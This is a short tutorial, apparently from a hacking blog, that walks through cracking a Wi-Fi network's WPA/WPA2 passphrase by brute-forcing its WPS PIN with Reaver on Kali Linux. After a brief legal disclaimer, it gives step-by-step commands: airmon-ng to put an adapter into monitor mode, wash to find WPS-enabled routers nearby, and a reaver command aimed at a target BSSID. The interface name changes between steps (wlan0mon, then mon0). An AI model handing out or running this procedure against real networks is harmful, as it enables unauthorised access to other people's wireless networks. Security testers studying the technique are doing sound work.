Reaver – Overview
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
NOTE: It is illegal to perform this attack on a network that does not belong to you unless you have explicit permission from the owner. The information presented here is for educational purposes only.
What You’ll Need
- Kali linux : Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing.It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphaël Hertzog are the core developers.
- Wireless USB Adapters : I cannot guarantee this will work with all the internal wireless card.I recommend a external wireless card.
- Patience : The process is simple but brute forcing the PIN takes time.So you have to be patient. Kicking the computer won’t help.
Steps for Hacking Wi-Fi using Reaver
- The first thing we need to do is enable the wireless USB adapter. Run the command “airmon-ng” to see if Kali recognizes your wireless USB adapter.It should show “Wlan0” along with the chipset.
- Once the wireless USB adapter is working we need to enable monitor mode.To do this run the following command “airmon-ng start wlan0”. If all goes well the screen will scroll by with some information then say monitor mode enabled on wlan0mon.
- To find a router that’s vulnerable to Reaver’s attack, we’ll use a tool called WASH, which let’s us scan nearby wireless networks that use WPS. Run the command “wash -i wlan0mon” to scan WPS enabled Wi-Fi.
- Copy the BSSID, then press CTRL+C to stop the terminal window.
- Now run the following command
reaver -i mon0 -b (Target BSSID) –vv
- Reaver will now run and start a brute force attack against the Pin number of the router.It will run until it finds the wireless password usually 2-10 hours.Here is a screenshot of what it looks like when Reaver cracks the password.